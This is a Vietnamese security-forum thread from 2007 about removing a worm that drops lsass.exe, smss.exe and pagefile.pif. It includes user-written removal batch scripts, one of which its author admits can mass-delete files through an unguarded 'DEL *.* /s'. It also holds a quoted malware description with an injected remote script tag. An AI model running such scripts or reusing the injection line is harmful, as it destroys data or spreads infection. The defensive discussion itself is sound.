[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
20/12/2007 22:25:26 (+0700) | #31 | 104943 |
noobxxx
Member
|
0 |
|
|
Joined: 09/06/2005 08:10:58
Messages: 22
Offline
|
|
Mình thấy con virus này thật là rắc rối, như trường hợp mình bị là file ~.exe nó ẩn trong tất cả các thư mục startup của các user, có 4 file nằm trong thư mục system32\com là lsass.exe, smss.exe, và 2 file gì nữa ctf gì gì đó. Trước khi kill process lần một mình bị auto shutdown, lần 2 mình gõ shutdown -a, thì nó không shutdown nhưng nó tự gọi ra thêm 1 loạt các file nhỏ, như ở các ổ logic nó xuất hiện 1 file tên kiểu như 1523241.exe rồi nó chạy thêm 1 file trong windows là nfsnut.exe, rồi cũng tự gọi thêm 1 file là ctfmon.exe. Không rõ là do nhiễm nên gọi nhiều hay sao vậy, và có một file nhỏ mình thấy nó hiện ra sau đó mất ngay là calcs.exe nằm cạnh file cacl.exe là cái máy tính con đó. Mình có 2 máy, 1 máy sau khi làm như bạn ghost nói + quét bằng lion thì nó bình thường, còn máy kia sau khi làm xong nó chạy như kiểu bị đơ, cực kỳ chậm, không rõ là bị sao nữa. Đấy là vài hiện tượng ở máy mình. |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
20/12/2007 23:03:40 (+0700) | #32 | 104948 |
|
Look2Me
Member
|
0 |
|
|
Joined: 26/07/2006 23:30:57
Messages: 235
Location: Tủ quần nào
Offline
|
|
Nói câu này bác Hoàng đừng buồn nhé:"Nghĩ đi nghĩ lại thì tất cả các virus mà FH của bác H cập nhật đều thuộc dạng không đủ độ khó".
^^
Em nghĩ bác nên pt module diệt rootkit và virus lây file đi.
Đẳng cấp của 1 antivirus là nằm ở chỗ đó.
Bác làm 1 mình thì rõ ràng không thể ăn nhằm ở việc đua tốc độ cập nhật được. |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
21/12/2007 00:04:38 (+0700) | #33 | 104961 |
|
VXer
Member
|
0 |
|
|
Joined: 20/12/2007 10:22:40
Messages: 44
Offline
|
|
Mình nghĩ cũng phải thông cảm cho bác Hoàng, một mình vừa phải lo reverse, code ... nên cũng chưa thể đưa ra một sản phẩm hoàn thiện được. Nhưng những module lây file và rootkit đúng là không thể thiếu, nhất là trong thời điểm hiện tại khi mà việc viết những virus này cũng trở nên khá phổ biến do có sẵn rất nhiều module, source trên mạng. Mong bác Hoàng tiếp tục cố gắng, chúc bác thành công |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
21/12/2007 02:46:35 (+0700) | #34 | 104995 |
|
Ghost Ship
Member
|
0 |
|
|
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
|
|
noobxxx wrote:
Mình thấy con virus này thật là rắc rối, như trường hợp mình bị là file ~.exe nó ẩn trong tất cả các thư mục startup của các user, có 4 file nằm trong thư mục system32\com là lsass.exe, smss.exe, và 2 file gì nữa ctf gì gì đó. Trước khi kill process lần một mình bị auto shutdown, lần 2 mình gõ shutdown -a, thì nó không shutdown nhưng nó tự gọi ra thêm 1 loạt các file nhỏ, như ở các ổ logic nó xuất hiện 1 file tên kiểu như 1523241.exe rồi nó chạy thêm 1 file trong windows là nfsnut.exe, rồi cũng tự gọi thêm 1 file là ctfmon.exe. Không rõ là do nhiễm nên gọi nhiều hay sao vậy, và có một file nhỏ mình thấy nó hiện ra sau đó mất ngay là calcs.exe nằm cạnh file cacl.exe là cái máy tính con đó. Mình có 2 máy, 1 máy sau khi làm như bạn ghost nói + quét bằng lion thì nó bình thường, còn máy kia sau khi làm xong nó chạy như kiểu bị đơ, cực kỳ chậm, không rõ là bị sao nữa. Đấy là vài hiện tượng ở máy mình.
Mình đã kiểm tra lại tất cả các startup của các user nhưng kô thấy thêm file ~.exe nào --> ở máy của mình nó chỉ tạo ra 1 file ~.exe trong user kích hoạt virus.
Bạn đã kill các process của nó như thế nào vậy? nếu bạn kể ra thì có thể mọi người sẽ nhìn ra điểm chưa hợp lý dẫn đến tình trạng đó.
Bạn nên search trong ổ C với từ khóa là dấu chấm (.) để liệt kê tất cả các file có trong ổ rồi sắp xếp chúng theo thứ tự date created --> bạn sẽ xác định được những file tạo ra trong ổ cùng thời điểm virus được kích hoạt --> xác định được file nào do virus tạo ra(nếu virus kô có tính năng thay đổi thuộc tính này của file).
Rất vui vì sự chia sẻ của bạn, đó quả là những thông tin rất có ích. Mình nghĩ nếu mọi người đều post lên các thông tin như của bạn thì sẽ giúp chúng ta hiểu về nó hơn khắc phục những điểm mà chúng ta chưa tự tìm ra --> topic sẽ rất có chất lượng. xin cám ơn sự chia sẻ của bạn! |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
21/12/2007 11:04:23 (+0700) | #35 | 105108 |
mrda_writer
Member
|
0 |
|
|
Joined: 11/12/2007 23:13:41
Messages: 3
Offline
|
|
Không biết máy nhà các cậu có triệu chứng này không chứ máy nhà tớ lại có.....Khi bật Task Manager lên thì nó liên tục hiện ra các file "IEXPLORE.EXE" Những file này thì có thể kill được nhưng bằng thừa vì nó liên tục hiện ra ngốn RAM liên tục.......Kill không xuể....Ngoài ra thỉnh thoảng máy lại hiện ra bảng Dont Sent File "LSASS.EXE" Ai mà tìm được phần mềm nào kill được con này hay cách nào để diệt được con này thì chia sẻ cho mọi người nhanh nhanh nhé......Nguy hiểm quá |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
21/12/2007 14:37:15 (+0700) | #36 | 105161 |
|
Ghost Ship
Member
|
0 |
|
|
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
|
|
|
|
[Question] Re:pagefile.pif, LSASS.EXE, SMSS.EXE |
21/12/2007 23:48:48 (+0700) | #37 | 105209 |
NGVANTEO
Member
|
0 |
|
|
Joined: 21/12/2007 01:50:32
Messages: 5
Offline
|
|
Chào mọi người tôi thấy diễn đàn rất hay , nên muốn góp vài câu
Đối với việc nhiểm file EXE dùng http://fasthelper.fire-lion.com/ cua Bác Hoàng để diệt
Khi virus đã nạp vào máy tôi dùng tập lệnh batch để Remove toàn bộ như sau.
Tải file lsass.rar tại đây : http://www.uploading.com/files/03HRVXBQ/lsass.rar.html
Trong do gom co 3 file Start.bat Lsass.bat và Lsass.reg
Chep ba file này vào trong thư mực gốc ổ đĩa c:\
Đóng lại tất cả các ứng dụng
Nhấn đúp vào file Start.bat để chạy.
Máy tính sẽ tự động thiết lập và re start lại máy tính.
Virus sẽ bi remove sau khi máy tính khởi động lại.
Duoi đây là nội dung từng file:
File Start.bat
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v lsass /t reg_sz /d "c:\lsass.bat" /F
REG IMPORT c:\LSASS.REG
shutdown -r -f -t 0
File Lsass.bat
echo off
CD\
CD %SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\DEFAULT USER\START MENU\PROGRAMS\STARTUP
DEL ~.EXE /A
CD\
CD %SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\ADMINISTRATOR\START MENU\PROGRAMS\STARTUP
DEL ~.EXE /A
CD\
CD %SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\ALL USERS\START MENU\PROGRAMS\STARTUP
DEL ~.EXE /A
CD\
CD %USERPROFILE%\START MENU\PROGRAMS\STARTUP
DEL ~.EXE /A
DEL C:\AUTORUN.INF /A:RHS
DEL C:\PAGEFILE.PIF /A
DEL D:\AUTORUN.INF /A:RHS
DEL D:\PAGEFILE.PIF /A
DEL E:\AUTORUN.INF /A:RHS
DEL E:\PAGEFILE.PIF /A
DEL F:\AUTORUN.INF /A:RHS
DEL F:\PAGEFILE.PIF /A
DEL G:\AUTORUN.INF /A:RHS
DEL G:\PAGEFILE.PIF /A
DEL H:\AUTORUN.INF /A:RHS
DEL H:\PAGEFILE.PIF /A
DEL I:\AUTORUN.INF /A:RHS
DEL I:\PAGEFILE.PIF /A
DEL J:\AUTORUN.INF /A:RHS
DEL J:\PAGEFILE.PIF /A
DEL K:\AUTORUN.INF /A:RHS
DEL K:\PAGEFILE.PIF /A
DEL L:\AUTORUN.INF /A:RHS
DEL L:\PAGEFILE.PIF /A
DEL %SYSTEMROOT%\SYSTEM32\COM\SMSS.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\COM\LSASS.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\COM\NETCFG.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\COM\NETCFG.000 /A
DEL %SYSTEMROOT%\SYSTEM32\DRIVERS\ALG.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\DRIVERS\NPF.SYS /A
DEL %SYSTEMROOT%\SYSTEM32\DNSQ.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\000.CFG0 /A
DEL %SYSTEMROOT%\SYSTEM32\PACKET.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\PTHREADVC.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\WPCAP.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\APPAND.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\NTFSUS.EXE /A
CD\
CD %USERPROFILE%\Local Settings\Temp
DEL *.* /s /f /q /a
cd..
rd /s /q temp
cd\
cd %USERPROFILE%\Local Settings\Temporary Internet Files
ATTRIB -R -H -S -A *.* /S /D
DEL *.* /f /q /a /s
DEL *.*
cd\
cd %USERPROFILE%\Local Settings\Cookies
ATTRIB -R -H -S -A *.* /S /D
DEL *.* /f /q /a /s
DEL *.*
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /V lsass /F
echo on
EXIT
FILE LSASS.REG
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
"Type"="checkbox"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001
|
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
22/12/2007 01:40:58 (+0700) | #38 | 105226 |
|
Ghost Ship
Member
|
0 |
|
|
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
22/12/2007 13:45:27 (+0700) | #39 | 105315 |
|
Ghost Ship
Member
|
0 |
|
|
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
|
|
Kết quả: file a.exe trong startup đã thắng có vẻ cách này kô khả thi rồi. pác NGVANTEO đã thử tác dụng của mấy file .bat chưa nhỉ? |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
23/12/2007 02:26:36 (+0700) | #40 | 105370 |
|
proxxmaxx
Member
|
0 |
|
|
Joined: 20/12/2007 11:52:03
Messages: 6
Offline
|
|
Bác GS thử chưa?
Kết quả mất một đống file hệ thống |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
23/12/2007 04:45:47 (+0700) | #41 | 105391 |
|
Ghost Ship
Member
|
0 |
|
|
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
|
|
proxxmaxx wrote:
Bác GS thử chưa?
Kết quả mất một đống file hệ thống
sao lại mất file hệ thống nhỉ? nó chỉ xóa những file của virus và những file rác của hệ thống thôi mà. kô biết nó có thịt được con virus kia kô thôi chứ nó thì an toàn chạy kô sao đâu. |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
23/12/2007 12:10:57 (+0700) | #42 | 105459 |
|
VXer
Member
|
0 |
|
|
Joined: 20/12/2007 10:22:40
Messages: 44
Offline
|
|
Ghost Ship wrote:
sao lại mất file hệ thống nhỉ? nó chỉ xóa những file của virus và những file rác của hệ thống thôi mà. kô biết nó có thịt được con virus kia kô thôi chứ nó thì an toàn chạy kô sao đâu.
Virus lây file mà! Có thể nó lây vào các file hệ thống, rồi sau đó AV disinfect hỏng file (hoặc delete hay quarantine gì đó) -> Mất file hệ thống. |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
23/12/2007 13:28:11 (+0700) | #43 | 105475 |
|
Ghost Ship
Member
|
0 |
|
|
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
|
|
VXer wrote:
Ghost Ship wrote:
sao lại mất file hệ thống nhỉ? nó chỉ xóa những file của virus và những file rác của hệ thống thôi mà. kô biết nó có thịt được con virus kia kô thôi chứ nó thì an toàn chạy kô sao đâu.
Virus lây file mà! Có thể nó lây vào các file hệ thống, rồi sau đó AV disinfect hỏng file (hoặc delete hay quarantine gì đó) -> Mất file hệ thống.
Thử ở đây kô phải là thử chạy virus mà là thử mấy file .bat vừa được up lên, mà mấy file .bat ấy thì an toàn nên kô thể mất file hệ thống được, chỉ có mất file rác của hệ thống thôi.
Có lẽ các thông tin về con này như vậy là đã đủ. Nếu ko có gì mới mẻ thì chúng ta nên kết thúc ở đây |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
24/12/2007 08:23:38 (+0700) | #44 | 105592 |
|
o0_Virgo_0o
Member
|
0 |
|
|
Joined: 25/09/2005 17:05:55
Messages: 3
Offline
|
|
Kết thúc sao được.
Đúng ngày hôm sau thi môn INT cần mang lap đến lớp thì em dính con LSASS và SMSS. Ôi, copy bài vào USB cho thằng bạn, nó kêu vừa làm lại máy ( có ngờ đâu rằng ổ khác vẫn còn), thế nà em dính. Về nó cứ bật lên cái bài nhạc trung quốc gì gì ấy. Hic, nhờ các bài viết trong này, và 1 số bài viết ở đâu đó, e tự tay kill được nó roài, đúng 12h đêm, ngày 19/12 thì phải. Con này e thấy có bài viết ở chỗ khác từ năm 06, nhưng h... tái xuất giang hồ hay sao ấy nhẩy?
He, thấy diễn đàn hay, h e là thành viên của diễn đàn roài. Nhưng đăng nhập chậm mà cứ bắt cài cái flassh j ấy nhỉ???? |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
24/12/2007 08:33:50 (+0700) | #45 | 105597 |
|
o0_Virgo_0o
Member
|
0 |
|
|
Joined: 25/09/2005 17:05:55
Messages: 3
Offline
|
|
Ah quên, phải nói như cái bác j ở... entry đầu tiên, sợ hãi pha lẫn hưng phấn. Diệt xong thì... nhẹ nhõm và thích thú. |
|
|
|
|
[Question] Re:pagefile.pif, LSASS.EXE, SMSS.EXE |
25/12/2007 00:04:12 (+0700) | #46 | 105725 |
NGVANTEO
Member
|
0 |
|
|
Joined: 21/12/2007 01:50:32
Messages: 5
Offline
|
|
Trong bài lần trước nếu trong máy không có thư mục Temp, thì sau lệnh CD\ và del *.* sẽ bị xóa hàng loạt file . Đúng là quá sai lầm. Nhân tiện cũng cảm ơn bác GS đã góp ý về bài của tôi
Sau đây tôi đề nghị cách giải quyết khác cũng bằng file Bat.
- Như đã biết sau khi virút đã nạp vào bộ nhớ thì ta không thể xóa file LSASS, SMSS... , mặt khác nó sẽ nhiểm vào các file cùng load với virút trong memory do đó khi ta kill virut thì các chương trình bị nhiểm sẽ tự động gọi lại virút.
- Điều gì sẽ xảy ra khi ta SUSPEND virút, mã lệnh vi rút không còn phát tán trong memory, các file nạp vào sau KHÔNG THỂ BỊ NHIỂM.
Sau đây là 4 file A.bat B.bat LSASS.REG và process.exe
http://www.uploading.com/files/XH6OR7QY/A.rar.html
1. Chép 4 file vào thư mục gốc ổ đĩa C.
2. dùng lệnh Run : c:\proccess -v để xác định PID của LSASS và SMSS (chú ý không phải của hệ thống)
3. Dùng Edit của Windows mở hai file A.bat và B.bat, chỉnh lại X là mã PID của LSASS, và Y là mã PID của SMSS sau đó save lại.
4. Nhấp đúp vào file A.bat.
A.bat
C:\PROCESS -S X
C:\PROCESS -S Y
C:\PROCESS -K Explorer.exe
C:\PROCESS -K TLNTSVR.EXE
C:\C:\PROCESS -K IEXPLORE.EXE
C:\C:\PROCESS -K RAR.EXE
CALL B.BAT
EXIT
B.bat
C:\PROCESS -k X
C:\PROCESS -k Y
%SYSTEMROOT%\EXPLORER.EXE /A
C:\PROCESS -V
ECHO NHAN PHIM BAT KI DE TIEP TUC...
PAUSE
CD\
CD %SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\ALL USERS\START MENU\PROGRAMS\STARTUP
ATTRIB -R -H -S -A ~.EXE
DEL ~.EXE /A
CD\
CD %USERPROFILE%\START MENU\PROGRAMS\STARTUP
ATTRIB -R -H -S -A ~.EXE
DEL ~.EXE /A
DEL C:\AUTORUN.INF /A:RHS
DEL C:\PAGEFILE.PIF /A
DEL D:\AUTORUN.INF /A:RHS
DEL D:\PAGEFILE.PIF /A
DEL E:\AUTORUN.INF /A:RHS
DEL E:\PAGEFILE.PIF /A
DEL F:\AUTORUN.INF /A:RHS
DEL F:\PAGEFILE.PIF /A
DEL %SYSTEMROOT%\SYSTEM32\COM\SMSS.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\COM\LSASS.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\COM\NETCFG.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\COM\NETCFG.000 /A
DEL %SYSTEMROOT%\SYSTEM32\DRIVERS\ALG.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\DRIVERS\NPF.SYS /A
DEL %SYSTEMROOT%\SYSTEM32\DNSQ.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\000.CFG0 /A
DEL %SYSTEMROOT%\SYSTEM32\PACKET.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\PTHREADVC.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\WPCAP.DLL /A
DEL %SYSTEMROOT%\SYSTEM32\APPAND.EXE /A
DEL %SYSTEMROOT%\SYSTEM32\NTFSUS.EXE /A
REG IMPORT c:\LSASS.REG
EXIT
FILE LSASS.REG
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
"Type"="checkbox"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001
|
|
|
|
|
[Question] Re:pagefile.pif, LSASS.EXE, SMSS.EXE |
25/12/2007 00:21:26 (+0700) | #47 | 105730 |
NGVANTEO
Member
|
0 |
|
|
Joined: 21/12/2007 01:50:32
Messages: 5
Offline
|
|
Chú ý trước khi chạy file A.BAT hãy đóng lại tất cả các ứng dụng chỉ để lại Explore.exe
|
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
25/12/2007 00:21:33 (+0700) | #48 | 105731 |
born2die
Member
|
0 |
|
|
Joined: 17/12/2007 11:49:02
Messages: 16
Offline
|
|
Bkav vẫn cập nhật con này đều đều mà. Trong miêu tả mới nhất thì đã đến phiên bản H rồi kìa (8 biến thể roài).
Con này lây vào các file thực thi và các file html nhưng nó chừa ổ đĩa hệ thống (có lẽ vì vậy mà GS mới diệt bằng tay thành công, không thì đừng có mơ).
Malware cập nhật mới nhất:
Tên malware: W32.DashferH.PE
Thuộc họ: W32.Dashfer.PE
Loại: PE
Ngày phát hiện mẫu: 22/12/2007
Kích thước: 100Kb
Mức độ phá hoại: Cao
Nguy cơ:
Làm giảm mức độ an ninh của hệ thống.
Hiện tượng:
Sửa registry.
Không vào được chế độ safe mode của windows.
Mất checkbox để hiển thị các file hệ thống.
Cách thức lây nhiễm:
Phát tán qua trang web.
Tự động lây nhiễm qua USB.
Lây qua các file thực thi.
Cách phòng tránh:
Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa.
Mô tả kỹ thuật:
Xóa các key :
HKLM\...\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\...\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\...\Windows\CurrentVersion\Run
Copy bản thân thành file có tên "lsass.exe" vào thư mục %SysDir%\Com, và ~.exe vào thư mục Startup
Tạo ra các file :
%SysDir%\Com\smss.exe
%SysDir%\Com\netcfg.dll
%SysDir%\Com\netcfg.000
Sửa key làm mất checkbox để hiển thị các file hệ thống.
Copy bản thân thành file có tên : "pagefile.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa.
Tắt các process có chứa một trong các xâu sau : asm, ida, softice, ollydbg, metapad, mozillauiwindowclass, ieframe, cabinetwclass, 360
Thêm vào cuối các file có đuôi: jsp, php, spx, asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể cả trong các file nén .rar) đoạn script :
<script src="http://js.k01[removed].com/01.asp"></script>
Lây nhiễm vào các file thực thi tìm được trong máy trừ ổ đĩa hệ thống.
|
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
25/12/2007 01:49:15 (+0700) | #49 | 105753 |
|
Ghost Ship
Member
|
0 |
|
|
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
|
|
born2die wrote:
Con này lây vào các file thực thi và các file html nhưng nó chừa ổ đĩa hệ thống (có lẽ vì vậy mà GS mới diệt bằng tay thành công, không thì đừng có mơ).
vậy nếu nó kô chừa mấy file hệ thống thì các AV có diệt được nó kô? hay là del hết file OS bị nhiễm rồi cho khổ chủ làm lại win?
Nói cho cậu biêt dù nó có ăn file hệ thống thì cách diệt của tôi vẫn thịt được nó mà kô cần làm lại win. kô có hiểu biết về chuyện gì thì ko nên đưa ra những nhận định như làm người khác khó chịu như thế
|
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
25/12/2007 07:11:07 (+0700) | #50 | 105842 |
born2die
Member
|
0 |
|
|
Joined: 17/12/2007 11:49:02
Messages: 16
Offline
|
|
Máy cài 2 win, bị nhiễm virus ở win này -> win kia bị lây tràn lan. Vừa dùng Bkav xong giờ ngon lành.
GhostShip thử phát
Mà nói thật chứ, nói câu không diệt được lây file có gì sai đâu mà không nhận nhỉ. Bản thân tôi nhận luôn là không tự diệt được worm, nhưng quan trọng là tôi sẽ cố gắng để diệt được. Chứ không nhận, lảng tránh thì đến bao giờ mới khá lên được. Đôi lời.... |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
25/12/2007 10:18:06 (+0700) | #51 | 105872 |
neo85
Member
|
0 |
|
|
Joined: 06/07/2007 10:16:40
Messages: 7
Offline
|
|
born2die wrote:
Máy cài 2 win, bị nhiễm virus ở win này -> win kia bị lây tràn lan. Vừa dùng Bkav xong giờ ngon lành.
GhostShip thử phát
Mà nói thật chứ, nói câu không diệt được lây file có gì sai đâu mà không nhận nhỉ. Bản thân tôi nhận luôn là không tự diệt được worm, nhưng quan trọng là tôi sẽ cố gắng để diệt được. Chứ không nhận, lảng tránh thì đến bao giờ mới khá lên được. Đôi lời....
He he đồng chí này là BKAV lover hả |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
25/12/2007 14:55:56 (+0700) | #52 | 105925 |
|
Ghost Ship
Member
|
0 |
|
|
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
25/12/2007 15:26:51 (+0700) | #53 | 105928 |
|
VXer
Member
|
0 |
|
|
Joined: 20/12/2007 10:22:40
Messages: 44
Offline
|
|
Các cao thủ cho gà này đóng góp chút ý kiến nhá
Ghost Ship wrote:
vậy nếu nó kô chừa mấy file hệ thống thì các AV có diệt được nó kô? hay là del hết file OS bị nhiễm rồi cho khổ chủ làm lại win?
Bạn ơi sao các AV diệt virus lây file là "del hết"?? Tui nhớ nhiều thằng nó disinfect lắm mờ!
Ghost Ship wrote:
Nói cho cậu biêt dù nó có ăn file hệ thống thì cách diệt của tôi vẫn thịt được nó mà kô cần làm lại win
Ghê ah nha! Bác dùng ollydbg, hexworkshop ... mở từng file ra rồi disinfect hả? Cho gà này học hỏi với!! Gà này chỉ biết trong trường hợp lây file thì tốt nhất là tìm thằng AV nào xịn xịn mang về test thử, tốt nhất là ghost lại ổ trước khi quét ah! Còn thích tự túc thì vác mẫu sang máy khác mà debug rồi làm tool. Mai mốt khăn gói sang nhà bác GS nhờ bác dạy disinfect bằng tay nhá |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
25/12/2007 16:16:16 (+0700) | #54 | 105932 |
sirlinh
Member
|
0 |
|
|
Joined: 25/12/2007 03:21:14
Messages: 1
Offline
|
|
Hic hic. Nói dùm em cách diệt cẩn thận được ko . Cũng mới bị dính loại này mà mãi ko xong . bác GS ơi đang online ra yaoo được ko . nick là onlyphuong99@yahoo.com |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
25/12/2007 16:21:43 (+0700) | #55 | 105933 |
|
Ghost Ship
Member
|
0 |
|
|
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
|
|
Edited chờ del |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
25/12/2007 16:24:57 (+0700) | #56 | 105934 |
|
Ghost Ship
Member
|
0 |
|
|
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
25/12/2007 22:20:15 (+0700) | #57 | 105959 |
|
VXer
Member
|
0 |
|
|
Joined: 20/12/2007 10:22:40
Messages: 44
Offline
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
25/12/2007 23:45:33 (+0700) | #58 | 105966 |
|
Ghost Ship
Member
|
0 |
|
|
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
25/12/2007 23:53:00 (+0700) | #59 | 105967 |
|
dangminh4
Member
|
0 |
|
|
Joined: 04/02/2007 21:44:21
Messages: 107
Offline
|
|
Mấy con virus này thì diệt có gì khó đâu , hiện nay cái khó mình muốn hỏi ở đây là hiện tượng mở một số ứng dụng rất là lâu , đặc biệt là mở trình duyệt IE bác nào biết về cái này thì nói cho tui vói nhé , cám ơn |
|
|
|
|
[Question] Re: pagefile.pif, LSASS.EXE, SMSS.EXE |
26/12/2007 00:13:01 (+0700) | #60 | 105976 |
born2die
Member
|
0 |
|
|
Joined: 17/12/2007 11:49:02
Messages: 16
Offline
|
|
"Có thể anh kô gà về kiến thức nhưng nếu anh gà về tư duy thì anh sẽ luôn làm mọi việc trở nên phức tạp. kiểu như để giết một con kiến anh lại đi cho nó vào phong thì nghiệm nghiên cứu chán chê để chế ra một loại thuốc độc rành riêng cho nó (để thể hiện mình là pro ) thay vì một cái bóp tay vậy "
Ôi ôi, lây file mà GS gọi là "kiến", quả là siêu cao...gà ), há há há há, chết mất, bó cờ him.
Nói cho gà GS biết chứ mấy bài đầu có người miêu tả khá chi tiết rồi, iem gà của bác theo hướng đó đã viết được tool remove rồi, chẳng qua khiêm tốn tí cho bác tự sướng thôi, há há há. Cần em gửi tool không, xin một tiếng |
|
|
Users currently in here |
2 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|